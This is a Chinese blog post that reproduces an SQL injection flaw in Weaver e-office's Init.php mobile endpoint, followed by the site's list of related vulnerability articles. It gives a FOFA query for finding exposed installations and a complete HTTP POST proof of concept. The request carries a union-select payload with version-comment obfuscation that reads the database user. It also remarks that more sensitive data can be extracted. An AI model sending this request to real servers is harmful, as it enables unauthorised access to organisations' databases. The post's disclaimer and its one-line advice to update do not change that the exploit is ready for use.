泛微e-office SQL注入漏洞复现

最新推荐文章于 2024-08-13 14:34:13 发布
最新推荐文章于 2024-08-13 14:34:13 发布
阅读量572 收藏 1
点赞数
文章标签: sql 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43981050/article/details/134201354
版权

前言

此文章仅用于技术交流,严禁用于对外发起恶意攻击!!!

一、产品简介

泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案。

二、漏洞描述

该系统的Init.php接口存在SQL注入漏洞,攻击者可获取用户敏感信息

三、影响范围

未知

四、复现环境

FOFA:app=“泛微-EOffice”

五、漏洞复现

1.访问存在漏洞的网站,抓包
在这里插入图片描述

2.POC

POST /E-mobile/App/Init.php?m=getSelectList_Crm HTTP/1.1
Host: IP
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 64

cc_parent_id=-999 /*!50000union*/ /*!50000select*/ 1,user()#

3.成功
在这里插入图片描述

六、漏洞利用

后续可获取数据库敏感信息

七、修复建议

请及时更新该系统到最新版本

参考链接

https://blog.csdn.net/holyxp/article/details/134175651

明丨通
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
泛微E-Office SQL注入漏洞复现
0xSec
11-28 1668
泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。
【1day】泛微e-office OA系统xml.php 文件 SORT_ID 参数 SQL 注入漏洞学习
记录并分享学习安全的知识点..
12-08 851
泛微e-office OA是一种企业级办公自动化(Office Automation)解决方案,由中国的泛微软件(FANWEI)开发和提供。它是一套集成办公、流程管理、协同办公、知识管理等功能于一体的全面办公平台。泛微e-office OA系统xml.php 文件SORT_ID 参数存在SQL 注入漏洞,攻击者通过在Web应用程序的输入字段中注入恶意的SQL代码,从而在后台数据库中执行未经授权的操作。
泛微e-office json_common.php SQL注入漏洞
CommputerMac的博客
10-18 576
泛微e-office为企业办公提供丰富应用,覆盖常见协作场景,开箱即用。满足人事、行政、财务、销售、运营、市场等不同部门协作需求,帮助组织高效管事理人。系统 json_common.php 文件存在SQL注入漏洞
泛微e-office系统存在SQL注入漏洞
holyxp的博客
11-02 877
泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案。
漏洞报送】泛微E-Office存在SQL注入漏洞(CNVD-2022-43246)
axiom2020的博客
06-08 2062
近日,CNVD发布的安全公告内,上海泛微网络科技股份有限公司的产品E-Office存在SQL注入漏洞,攻击者可以通过该漏洞获取到数据库敏感信息。
【1day】泛微e-office OA SQL注入漏洞学习
记录并分享学习安全的知识点..
10-17 457
泛微e-office OA是一种企业级办公自动化(Office Automation)解决方案,由中国的泛微软件(FANWEI)开发和提供。它是一套集成办公、流程管理、协同办公、知识管理等功能于一体的全面办公平台。泛微e-office OA存在SQL注入漏洞,攻击者通过在Web应用程序的输入字段中注入恶意的SQL代码,从而在后台数据库中执行未经授权的操作。
黑客必知:揭秘泛微OA SQL注入漏洞,轻松入侵系统的绝佳方法!
自强不息
08-15 359
有子曰:“其为人也孝弟,而好犯上者,鲜矣。不好犯上,而好作乱者,未之有也。君子务本,本立而道生。孝弟也者,其为仁之本与?”
泛微E-Office10远程代码执行漏洞
05-06
泛微E-Office 10确实存在远程代码执行漏洞,这个漏洞**可能导致严重的安全后果**。 该漏洞的关键在于系统处理上传的PHAR文件时存在的缺陷。攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的...
泛微e-office短信插件_泛微短信接口开发_e-office短信发送设置
02-11
泛微e-office短信插件设置指南 在泛微e-office V10.0版本中,设置短信发送功能需要通过泛微短信接口进行开发。下面将详细介绍泛微e-office短信插件的设置步骤和泛微短信接口的开发过程。 一、泛微e-office短信插件...
最新泛微E-office10.5 泛微Eoffice V10.5 泛微E-office10.0 Eoffice10.0 泛微E-offic95 泛微Eoffice9.0 8.0 泛微行政事业V10.0-附件资源
03-02
最新泛微E-office10.5 泛微Eoffice V10.5 泛微E-office10.0 Eoffice10.0 泛微E-offic95 泛微Eoffice9.0 8.0 泛微行政事业V10.0-附件资源
泛微e-office10to11升级包(适用10.0-20221012)
12-20
泛微协同办公平台e-office10 to e-office11升级包(适用10.0_20221012) 版本: 11.0_2022 发布日期: 2022-11-22 适合升级版本: 10.0_20221012版 注意事项: 1.标准升级程序包,不适用于做过二次开发的10.0系统,...
泛微e-officev10.0_20220809标准补丁(适用于v10.0_20180119及以上版本)
08-26
版本: 10.0_20220809 发布日期: 2022-08-10 适合升级版本: 10.0_20180119版 说明: 补丁包是累计的,故20220809版本包含历史补丁包内容。 安装注意事项 *************必须执行备份后才允许安装补丁*************...
E-office OA SQL注入漏洞复现
afei001
01-08 1008
目录 1.漏洞概述 2.影响范围 3.漏洞等级 4.漏洞复现 5.漏洞分析 6.漏洞修复 1.漏洞概述 泛微e-office泛微公司面向中小型组织推出的OA产品,简单易用高效,部署快、投资少。提供免费试用体验。但泛微e-office OA系统存在的漏洞还真不少。这个SQL注入漏洞之前早就在乌云上爆出过了。 泛微E-office官网:www.weaver.com.cn 2.影响范围 受影响版...
漏洞复现泛微e-Weaver SQL注入
失心少年
11-19 711
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。该平台提供了一系列的功能模块,包括企业门户、流程管理、文档管理、知识管理、协同办公、人力资源管理、客户关系管理等。这些模块可以根据企业的实际需求进行定制和配置,以满足不同行业和组织的特定需求。泛微e-Weaver(FANWEI e-Weaver)是一款广泛应用于企业数字化转型领域的集成协同管理平台。
泛微e-cology9 SQL注入漏洞复现(QVD-2023-5012)
ZL_1618的博客
03-09 1734
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。泛微e-cology9中存在SQL注入漏洞,未经身份认证的远程攻击者即可利用此漏洞获取数据库敏感信息,进一步利用可能导致目标系统被控。
0day 泛微E-Mobile 6.0 存在命令执行
失心少年
08-01 1036
泛微E-Mobile 6.0被爆存在漏洞命令执行。现已确认该漏洞可被攻击者利用,攻击者可通过在输入中添加特殊字符或命令来序列欺骗应用程序将其作为有效命令去执行,从而获取服务器的执行权限。
泛微OA-SQL注入漏洞
maverickpig的博客
01-23 8673
泛微OA sql注入汇总
注入补丁_重大漏洞泛微E-cology OA系统SQL注入漏洞及解决方案
weixin_33586063的博客
01-03 2535
泛微E-cology OA系统SQL注入漏洞cnvd 国家信息安全漏洞共享平台发布【漏洞预警】CNNVD关于泛微E-cology OA系统SQL注入漏洞情况的通报一、漏洞介绍 泛微E-cology OA系统是一套兼具企业信息门户、知识管理、数据中心、工作流管理、人力资源管理、客户与合作伙伴管理、项目管理、财务管理、资产管理功能的协同商务平台。泛微e-cology OA系统的WorkflowCent...
血缘系统 datahub + Sqllineage
最新发布
weixin_42687074的博客
08-13 301
业界比较主流的数据血缘系统,目前还没能达到与调度系统耦合,最大难点在于代码解析。当某张表下游太多时(特别是维度表),展示也失去了意义,所以多用于排查某张应用表的上游从哪里开。使用方一般为对数仓表结构不太熟悉的业务/数据经理想要了解有哪些数据。
泛微e-office10本地升级
01-30
泛微e-office10是一款优秀的办公自动化软件,其本地升级操作非常简单。首先,我们需要下载最新的e-office10升级包,通常可以在官方网站或相关论坛获取。接着,我们需要备份好原有的e-office10数据,以防止升级过程中出现意外情况导致数据丢失。然后,我们运行升级包,按照界面提示进行操作,通常只需要点击几次“下一步”即可完成升级过程。等待片刻后,系统会自动完成升级,并提示我们重新启动e-office10软件。最后,我们可以打开软件,确认升级是否成功,通常会显示软件版本号已经更新。需要注意的是,在升级过程中,一定要保持电脑网络连接稳定,防止升级失败。总的来说,泛微e-office10的本地升级非常方便快捷,只需要简单的几个步骤就能完成,而且升级后的新版本通常会带来更好的功能和性能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值